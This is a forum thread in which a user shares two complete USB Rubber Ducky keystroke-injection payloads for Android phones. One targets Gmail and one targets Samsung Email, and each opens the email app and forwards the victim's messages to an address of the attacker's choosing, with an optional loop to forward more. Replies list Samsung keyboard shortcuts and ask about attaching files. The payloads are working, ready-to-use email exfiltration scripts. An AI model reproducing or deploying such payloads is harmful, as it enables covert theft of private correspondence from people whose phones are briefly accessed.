Cribbit Posted May 24, 2020 Share Posted May 24, 2020 I was playing around with the ducky and an android phone and wrote a payload to forward an email to the address specified. There are two version one for Gmail and one for Samsung Email. Use GUI + E to find your default app. I put a comment in for a loop so if you wish to forward more than one. GMAIL: REM Forwards the first email in the primary section REM Only works for phones. REM Does not work tablets as menu bar stops tabs REM GMAIL SHORTCUTS https://support.google.com/mail/answer/6594?co=GENIE.Platform%3DAndroid&hl=en&oco=1 DELAY 1000 GUI e DELAY 1000 TAB DELAY 500 TAB DELAY 500 ENTER REM LOOP FROM HERE DELAY 500 CTRL r DELAY 1000 TAB DELAY 500 SHIFT TAB DELAY 500 BACKSPACE DELAY 500 STRING your@email.com CTRL ENTER DELAY 1000 REM Moves to the next email RIGHTARROW REM GOTO LOOP SAMSUNG: REM Forwards the first email DELAY 1000 GUI e DELAY 1000 TAB DELAY 500 TAB DELAY 500 TAB DELAY 500 TAB DELAY 500 ENTER REM LOOP FROM HERE DELAY 500 SHIFT TAB DELAY 500 LEFTARROW LEFTARROW LEFTARROW LEFTARROW RIGHTARROW RIGHTARROW ENTER DELAY 500 STRING your@email.com DELAY 500 SHIFT TAB DELAY 500 SHIFT TAB DELAY 500 ENTER DELAY 500 REM Moves to the next email TAB RIGHTARROW RIGHTARROW LEFTARROW ENTER REM GOTO LOOP Link to comment Share on other sites More sharing options...
AndNow Posted May 26, 2020 Share Posted May 26, 2020 Is there a comprehensive list of android shortcut keys? Link to comment Share on other sites More sharing options...
Cribbit Posted May 26, 2020 Author Share Posted May 26, 2020 Probably not as many manufacturers add/remove shortcuts Here are the shortcuts for a Samsung don't know how many are generic to Android: Home screen: Apps list - Alt + A System: Home - GUI + Enter Back - GUI + Backspace Recent - Alt + Tab Notifications - GUI + N Keyboard shortcuts - GUI + / Lock Screen - GUI + L Switch Languages - SHIFT + SPACE Switch Languages - CTRL + SPACE Switch Languages - LEFT ALT + SHIFT Start/Exit DeX mode GUI + W Applications: Browser - GUI + B Contacts - GUI + C Email - GUI + E Messages - GUI + S Music - GUI + P Calendar - GUI + K Link to comment Share on other sites More sharing options...
AndNow Posted June 1, 2020 Share Posted June 1, 2020 Been watching @Darren Kitchen on twitch trying to add an attachment to an email. Is there a way using the rubber ducky language? Link to comment Share on other sites More sharing options...
kuyaya Posted June 2, 2020 Share Posted June 2, 2020 On 6/1/2020 at 5:23 PM, AndNow said: Been watching @Darren Kitchen on twitch trying to add an attachment to an email. Is there a way using the rubber ducky language? Don't ping him pls... Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.